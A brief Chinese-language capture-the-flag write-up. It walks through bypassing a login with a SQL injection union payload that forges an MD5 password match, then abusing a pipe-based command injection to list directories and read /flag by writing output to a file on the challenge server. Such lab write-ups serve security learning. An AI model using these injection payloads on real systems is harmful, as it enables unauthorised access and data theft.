sqlmap扫目录可以注入,但是内容为空
所以不存在猜密码的选项了
用repeater发送后看到有个tip 是一串base64加密的字符,解密后明文:
审计后发现可以构造一个不存在的用户进行登录,查询的密码要和md5加密后的一致,构造payload:
username=admin’ union select 1,md5(123)#&password=123
进入shell界面
用|
绕过
传入123|ls
没有回显
采用写入文件二次返回的方法查看结果
1 | 123|ls ../../../>test |
然后访问http://114.67.246.176:13110/test
cat出flag123|cat /flag>test